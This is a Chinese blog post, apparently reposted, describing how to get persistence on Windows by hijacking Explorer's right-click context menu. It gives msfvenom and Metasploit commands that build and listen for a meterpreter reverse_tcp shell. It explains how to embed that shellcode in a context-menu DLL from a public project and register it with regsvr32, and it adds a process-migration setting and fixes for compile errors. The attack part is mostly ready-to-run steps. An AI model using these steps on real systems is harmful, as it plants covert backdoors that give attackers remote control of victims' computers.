劫持资源管理器实现持久性后门

简介: 劫持资源管理器实现持久性后门

0x01 前言

最近看到一篇有关《劫持Explorer.exe实现持久性》的文章,只要用户右键单击文件资源管理器中的文件或文件夹就会触发,简单记录下本地复现过程!


0x02 复现过程

CobaltStrike或Metasploit生成一个C格式shellcode,将shellcode中的"都替换为空,再用\r\n将其放在一行,配置好相关参数执行监听。

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f c
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.1.120
    set lport 443
    exploit

    VS打开该项目,在FileContextMenuExt.cpp第13行处插入我们处理好的shellcode,直接编译得到一个ContextMenuHijack.dll。


    项目地址:

      https://github.com/RistBS/ContextMenuHijack

      接着我们通过执行以下命令用regsvr32注册下这个dll文件,如果想卸载掉只需加个/u参数即可。


      注册:

        regsvr32 ContextMenuHijack.dll

        卸载:

          regsvr32 /u ContextMenuHijack.dll

          这时只要我们右键文件或文件夹就会触发上线,但这种方式极易造成Explorer.exe资源管理器奔溃,导致会话掉线,建议加个自动迁移进程参数。

            set AutoRunScript migrate -f

            0x03 编译问题

            我的VS版本2017,但这个项目是2022编译的,所以编译时可能由于VS版本问题而出现下图报错:错误 MSB8020 无法找到 v143 的生成工具(平台工具集 =“v143”)。若要使用 v143 生成工具进行生成,请安装 v143 生成工具。或者,可以升级到当前 Visual Studio 工具,方式是通过选择“项目”菜单或右键单击该解决方案,然后选择“重定解决方案目标”


            解决方法:

              选中项目 -> 右键属性 -> 将平台工具集选为VS2017(V141);
              选中工程 -> 重定解决方案目标 -> 选择当前Windows SDK版本;
              打开项目根目录下.vcxproj后缀文件,将v143全替换为v141,保存;
              切换回Visual Studio,检测到文件修改,我们选择“全部重新加载”;
              再次选中工程 -> 重新生成解决方案 -> 已经编译成功,完美解决该问题。


              参考链接:

              https://pentestlab.blog/2023/03/13/persistence-context-menu/
              https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html
              相关文章
              |
              9天前
              |
              监控 安全 虚拟化
              降级攻击可“复活”数以千计的Windows漏洞
              在本周举行的黑帽大会(Black Hat 2024)上,安全研究员Alon Leviev曝光了一个微软Windows操作系统的“超级漏洞”,该漏洞使得攻击者可以利用微软更新进程实施降级攻击,“复活”数以千计的微软Windows漏洞,即便是打满补丁的Windows11设备也将变得千疮百孔,脆弱不堪。
              |
              安全 搜索推荐 JavaScript
              网站被入侵快照被劫持该如何解决
              网站安全是重中之重对此我们Sinesafe对于网站被挂马被黑的防范意识,如何判断网站被黑,网站被挂马,网站快照被劫持,网站快照被篡改,导致被百度网址安全中心提醒您:该页面可能存在违法信息。
              137 0
              网站被入侵快照被劫持该如何解决
              |
              SQL Windows
              1433映像劫持后门提权
              首先: 1.服务器开启了终端端口(终端端口未必是3389,可以自行查询) 2.服务器的粘滞键功能无损,只要可以正常弹出即可 3.
              909 0
              零信任远程浏览器隔离
              本文研究全球及中国市场零信任远程浏览器隔离现状及未来发展趋势,侧重分析全球及中国市场的主要企业,同时对比北美、欧洲、中国、日本、东南亚和印度等地区的现状及未来发展趋势
              |
              Windows
              绕过AppLocker系列之MSIEXEC的利用
              本文讲的是绕过AppLocker系列之MSIEXEC的利用,MSIEXEC是Windows操作系统中的一个实用程序,可用于从命令行安装或配置产品。 如果环境配置不正确,则使用.MSI文件就可以允许攻击者执行权限升级或绕过AppLocker规则。
              1772 0
              |
              Shell Windows 存储
              绕过AppLocker系列之控制面板的利用
              本文讲的是绕过AppLocker系列之控制面板的利用,使用默认规则实现AppLocker不能提供任何充分的保护,因为通过使用合法的Windows二进制文件和利用常见的系统错误配置就会产生多个绕过方法。在Windows系统中,当用户打开控制面板时,会加载多个CPL文件。
              1259 0